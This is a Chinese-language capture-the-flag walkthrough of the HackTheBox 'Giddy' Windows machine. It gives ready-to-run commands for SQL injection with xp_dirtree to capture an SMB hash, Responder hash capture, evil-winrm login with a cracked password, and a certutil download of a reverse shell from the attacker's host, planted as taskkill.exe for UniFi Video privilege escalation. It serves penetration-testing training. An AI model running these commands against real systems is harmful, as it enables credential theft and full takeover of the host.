[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-Shell+UniFi-Video权限提升
字数 1495 2025-08-29 08:30:12
Windows PowerShell Web Access 漏洞利用与权限提升教学文档
1. 信息收集阶段
1.1 目标识别
目标IP: 10.10.10.104
主机名: Giddy
操作系统: Windows (版本10.0.14393)
1.2 端口扫描结果
使用nmap和masscan扫描发现以下开放端口:
- 80/tcp: Microsoft IIS httpd 10.0
- 风险方法: TRACE
- 标题: IIS Windows Server
- 443/tcp: Microsoft IIS httpd 10.0 (SSL)
- 证书CN: PowerShellWebAccessTestWebSite
- 风险方法: TRACE
- 3389/tcp: Microsoft Terminal Services (RDP)
- 目标信息:
- NetBIOS_Domain_Name: GIDDY
- NetBIOS_Computer_Name: GIDDY
- DNS_Domain_Name: Giddy
- DNS_Computer_Name: Giddy
- 目标信息:
2. 初始访问
2.1 主机名解析
echo '10.10.10.104 giddy.htb' >> /etc/hosts
2.2 目录枚举
使用feroxbuster发现以下关键路径:
http://giddy.htb/Remote/en-US/logon.aspx?ReturnUrl=%2fRemote%2fhttp://giddy.htb/mvc/
2.3 SQL注入攻击
使用sqlmap进行SQL注入:
- 枚举数据库内容:
sqlmap -u 'http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=1' -dump --batch
- 触发OOB (Out-of-Band)数据泄露:
sqlmap -u "http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=1" --sql-query "EXEC MASTER.sys.xp_dirtree '\\\\10.10.16.33\\share'" --batch
2.4 捕获NTLMv2哈希
使用Responder捕获NTLMv2哈希:
responder -I tun0
捕获到的哈希:
Stacy::GIDDY:87a923d765a8db30:6AD2E27D1AA6627209D5E141E4756AFD:0101000000000000002D7C41DA94DB01A5E36FED99194C60000000000200080030004B003900500001001E00570049004E002D004A004400300033004E0043003400350039003400360004003400570049004E002D004A004400300033004E004300340035003900340036002E0030004B00390050002E004C004F00430041004C000300140030004B00390050002E004C004F00430041004C000500140030004B00390050002E004C004F00430041004C0007000800002D7C41DA94DB0106000400020000000800300030000000000000000000000000300000BE837E86F4FAFD3C8FA9F65A4962CAA5E70A4DE45B90CD7D2B64F70E931E169B0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0033003300000000000000000000000000
破解后得到的密码: xNnWo6272k7x
2.5 使用Evil-WinRM获取初始访问
evil-winrm -i 10.10.10.104 -u 'giddy\stacy' -p 'xNnWo6272k7x'
获取到的用户flag: 53808bfee1c938401f62ff12e0cf17bc
3. 权限提升
3.1 利用UniFi Video服务漏洞
UniFi Video是Ubiquiti Networks的视频监控管理软件,在服务启动时会尝试在C:\ProgramData\unifi-video\中执行taskkill.exe文件。
3.1.1 检查服务权限
- 切换到Windows服务注册表目录:
Set-Location 'HKLM:\SYSTEM\CurrentControlSet\Services'
- 检查
C:\ProgramData\unifi-video\目录权限:
icacls C:\ProgramData\unifi-video\
- 查找相关服务:
dir *UniFi*
3.1.2 准备反向Shell
使用Chameleon工具生成反向shell:
docker run --rm -v /path/to/reverseshell:/tmp chameleon -gcc reverse_win.c
3.1.3 上传恶意文件
使用certutil下载反向shell并重命名为taskkill.exe:
certutil -urlcache -f http://10.10.16.33/reverse_win_win_x86_64.exe taskkill.exe
3.1.4 重启服务触发漏洞
Stop-Service "Ubiquiti UniFi Video"
Start-Service "Ubiquiti UniFi Video"
3.2 获取系统权限
成功获取root权限后,获取root flag: 617e9b8600be08870d099e98e5359f74
4. 关键工具与资源
-
信息收集工具:
- nmap
- masscan
- feroxbuster
-
漏洞利用工具:
- sqlmap
- Responder
- evil-winrm
-
权限提升工具:
- Chameleon (https://github.com/MartinxMax/Chameleon)
- UniFi Video漏洞利用代码 (https://www.exploit-db.com/exploits/43390)
-
技术要点:
- SQL注入导致OOB数据泄露
- NTLMv2哈希捕获与破解
- Windows服务滥用导致的权限提升
- 通过服务启动时执行特定文件实现代码执行